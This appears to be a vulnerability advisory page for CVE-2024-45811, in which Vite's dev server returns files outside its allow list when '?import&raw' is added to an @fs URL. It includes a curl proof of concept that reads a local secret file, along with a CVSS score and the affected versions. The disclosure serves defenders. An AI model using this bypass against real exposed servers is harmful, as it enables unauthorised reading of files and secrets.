CVE-2024-45811

Vite's `server.fs.deny` is bypassed when using `?import&raw`

### SummaryThe contents of arbitrary files can be returned to the browser.### Details`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.### PoC```sh$ npm create vite@latest$ cd vite-project/$ npm install$ npm run dev$ echo "top secret content" > /tmp/secret.txt# expected behaviour$ curl "http://localhost:5173/@fs/tmp/secret.txt"

403 Restricted

The request url "/tmp/secret.txt" is outside of Vite serving allow list.# security bypassed$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"export default "top secret content\n"//# sourceMappingURL=data:application/json;base64,eyJ2...```

Patch Available

Fix available through Seal Security. No upgrade required, protect your application instantly.

Fix without upgrading

Vulnerability Details

Score

5.3

Score Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Affected Versions

vite >= 5.4.0 < 5.4.6; vite >= 5.3.0 < 5.3.6; vite >= 5.2.0 < 5.2.14; vite >= 4.0.0 < 4.5.4; vite < 3.2.11; vite >= 5.0.0 < 5.1.8

Severity

Medium

Ecosystem

JavaScript

Publish Date

September 17, 2024

Modified Date

September 19, 2024